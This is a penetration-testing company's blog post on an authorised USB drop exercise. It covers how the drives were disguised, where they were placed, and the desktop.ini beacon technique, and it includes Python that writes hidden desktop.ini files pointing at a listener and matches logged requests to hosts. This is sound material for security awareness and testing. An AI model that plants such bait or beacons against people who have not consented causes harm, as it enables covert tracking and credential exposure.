CCL's Ben Strudwick draws on a recent real-life project to illustrate why getting creative can make for effective cyber security training.
Here at CCL our Penetration Testing Team perform a wide variety of tests to accommodate our clients’ needs. From web application penetration tests to network device configuration reviews, the team offer a broad range of testing so that clients gain a clearer view of their security posture.
One request that particularly stood out recently was for USB drop testing.
Cyber security is a collective effort within a business; if one piece of the jigsaw is missing, the whole security posture is weakened. The client who commissioned this project wanted to test exactly that, and specifically the widely held view that people are the weakest link in modern cyber defences. Their objective was to challenge their staff’s security awareness by assessing whether anybody in the workforce would let their guard down while going about their day. The USB drops project was therefore an interesting social experiment, trialling the ever-present risks of social engineering and human error.
USB drops (sometimes called USB baiting; the term ‘USB dead drop’ is also used loosely, although strictly that refers to drives cemented into walls for anonymous file sharing) are a form of USB-based attack that criminals can deploy against a target. Innocent-looking USB drives are planted around a physical location in the hope that they entice passers-by to plug them in. Creativity is required to make an ordinary drive appear so tantalising that an unsuspecting finder feels compelled to see what is stored on it. The device carries malicious content: a document or executable that installs spyware, a keylogger, ransomware or a backdoor; a file that draws the finder into further social engineering; or, with purpose-built hardware, a device that presents itself as a keyboard and types commands. Once the drive is plugged in and opened, the payload runs on the victim’s machine, compromising it and potentially more. Note that on a patched Windows machine nothing executes simply on insertion (Microsoft disabled AutoRun for removable storage in 2011), so the attack relies on the finder opening something, or on hardware that masquerades as a different device class.
During a recent engagement, the phishing component of the work took the form of USB drops: our Testing Team had to plant a number of "malicious" USB drives around the client’s sites.
Firstly, the team took measures to ensure the USB drives appeared legitimate: they should look as though they related to the client company and held data the finder would consider ‘valuable’. After all, this attack relies solely upon a human decision as to whether the risk is worth taking (if any scepticism is exercised at all); human error is the vulnerability being exploited. The physical appearance of the drives matters a great deal here. The team were mindful that the drives should not look *too* new, as they wanted them to seem used to some extent… Kicking them around a car park for a few minutes achieves effective results!
Attaching other objects to a drive is also convincing, as it paints a stronger picture of the device’s backstory. The team attached keys to some of the drives, including a set of car keys, which makes a drive look innocent, as though it belonged to somebody who used it every day. As it turns out, old keys are relatively easy to acquire via online marketplaces.
At this stage the drives looked tempting enough to use, but new questions arose: where should they be planted, and how? The manner of deployment can make all the difference, because the situation in which a finder discovers a drive influences their decision-making. They may ask themselves "How did that get there?” and “Who could have left it here?", and will naturally settle on the most plausible explanation. This is useful, as those thought processes can be steered by fine details. For this engagement, the team considered places where someone might genuinely drop a USB drive:
• A car park between cars whilst someone is taking keys in or out of their pocket;
• Within a nearby smoking area;
• Reception areas / public corridors;
• Staff areas (harder for an outsider to reach);
There are also purpose-built devices, such as keystroke-injection tools that enumerate as a keyboard and type commands as soon as they are plugged in. These can be excellent for gaining access to target systems; however, they are relatively expensive if you plan on leaving them around a car park with the risk of never seeing them again.
For the technical aspect of this test, the team used a ‘desktop.ini’ file on the drive as their attack method of choice. When the user opens the drive in Windows Explorer, Explorer reads desktop.ini and tries to load the icon it references; that reference points at a listener the team set up as a web server on the relevant network, so simply browsing the drive generates a request. Each request was logged, giving the team a record of users who had connected a distributed drive when they should not have. The hostname of the PC and the corresponding drive ID were visible in the log, so each drive could be cross-referenced to the host it was opened on. Two caveats worth noting: this only detects drives that are opened in Explorer, not drives that are merely plugged in and ignored, and a request is only seen if the victim machine can reach the listener.
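As an added example (not CCL’s tooling, and not code from this article), the Python below shows the two halves of that approach: generating a per-drive desktop.ini whose icon reference carries a unique drive ID, and correlating a listener’s log back to drive IDs and hostnames. It assumes the icon reference is a UNC path (which Windows fetches over SMB, or WebDAV if the WebClient service is running); the listener address (10.0.0.5), share name (drops), bait folder name and the log line format are all assumptions, and the log lines are constructed.

```python
"""Stage per-drive desktop.ini bait files and correlate listener logs.

Added example, not CCL's tooling. Listener host, share name, bait folder
name and the log line format below are assumptions for illustration.
"""
import os
import re
import subprocess
from collections import defaultdict
from pathlib import Path

LISTENER_HOST = "10.0.0.5"   # assumed listener on the client's network
SHARE = "drops"              # assumed share / path prefix on the listener
BAIT_FOLDER = "Q3 Payroll"   # constructed bait folder name


def build_desktop_ini(drive_id: str) -> str:
    """Return desktop.ini text whose icon lives on the listener.

    When Explorer displays the folder it reads [.ShellClassInfo] and tries to
    load IconResource. A UNC path makes the victim machine connect to the
    listener (SMB first, then WebDAV if the WebClient service is running), and
    the per-drive path segment identifies which drive was opened.
    """
    unc = rf"\\{LISTENER_HOST}\{SHARE}\{drive_id}\folder.ico"
    return f"[.ShellClassInfo]\r\nIconResource={unc},0\r\n"


def stage_drive(root: Path, drive_id: str) -> Path:
    """Write the bait folder and its desktop.ini under `root` (the mounted drive)."""
    folder = root / BAIT_FOLDER
    folder.mkdir(parents=True, exist_ok=True)
    ini = folder / "desktop.ini"
    ini.write_text(build_desktop_ini(drive_id), encoding="utf-8")
    if os.name == "nt":
        # Explorer only honours desktop.ini when the folder carries the System
        # (or ReadOnly) attribute; the file itself is conventionally Hidden+System.
        subprocess.run(["attrib", "+s", str(folder)], check=False)
        subprocess.run(["attrib", "+h", "+s", str(ini)], check=False)
    return ini


# Constructed listener log (format is an assumption). It deliberately contains a
# repeated icon request from one host, an ID that was never issued, and a line
# with no file path at all.
SAMPLE_LOG = r"""
2024-05-02T09:14:03Z client=192.168.10.44 host=WS-FIN-07 path=\\10.0.0.5\drops\usb03\folder.ico
2024-05-02T09:14:03Z client=192.168.10.44 host=WS-FIN-07 path=\\10.0.0.5\drops\usb03\folder.ico
2024-05-02T11:02:41Z client=192.168.10.91 host=LT-HR-02 path=\\10.0.0.5\drops\usb01\folder.ico
2024-05-02T11:30:00Z client=192.168.10.5 host=SCAN-BOX path=\\10.0.0.5\drops\usb99\folder.ico
2024-05-02T11:31:12Z client=192.168.10.91 host=LT-HR-02 tree_connect=\\10.0.0.5\IPC$
""".strip()

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+client=(?P<ip>\S+)\s+host=(?P<host>\S+)\s+"
    r"path=\\\\[^\\]+\\" + re.escape(SHARE) + r"\\(?P<drive>[^\\]+)\\"
)


def correlate(log_text: str, issued: set) -> dict:
    """Map issued drive IDs to the hosts that opened them.

    Returns hits (drive -> [(host, ip, first_seen)]), unknown requests for IDs
    that were never issued (path guessing, or a copied desktop.ini), and the
    issued drives that produced no request at all.
    """
    hits = defaultdict(list)
    unknown = []
    seen = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tree connects, IPC$ probes and other noise carry no drive ID
        drive, host = m["drive"], m["host"]
        if drive not in issued:
            unknown.append((drive, host, m["ts"]))
            continue
        if (drive, host) in seen:
            continue  # Explorer re-requests icons; count each host once per drive
        seen.add((drive, host))
        hits[drive].append((host, m["ip"], m["ts"]))
    return {
        "hits": dict(hits),
        "unknown": unknown,
        "untouched": sorted(issued - set(hits)),
    }


if __name__ == "__main__":
    result = correlate(SAMPLE_LOG, {"usb01", "usb02", "usb03"})
    for drive, opened_by in result["hits"].items():
        for host, ip, ts in opened_by:
            print(f"{drive} opened on {host} ({ip}) at {ts}")
    print("never opened:", result["untouched"])
    print("unknown IDs requested:", result["unknown"])
```

On a Windows staging machine you would call `stage_drive(Path("E:\\"), "usb03")` once per drive with the drive mounted; the `untouched` list is what an engagement like the one described above ends with when nobody opens a drive, and `unknown` is worth reviewing because a request for an ID you never issued means someone is probing the listener or has copied a desktop.ini elsewhere.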
Despite our best efforts, the findings showed that no users plugged in any of the USB drives deployed throughout the site. The client’s staff exceeded all expectations and instead went out of their way to report the suspicious drives to more senior members of the affected departments. News travelled fast, and within a very short period the surrounding personnel had been warned not to use them.
The client was very satisfied, both with the lengths we went to in simulating a convincing attack and with the response shown by their employees. The engagement assured them that their users exercised caution by not using the USB drives that had been purposely dispensed throughout the business, regardless of how tempting they appeared. It also helped to raise security awareness and reiterated to staff the vital role they play in safeguarding their organisation from attack.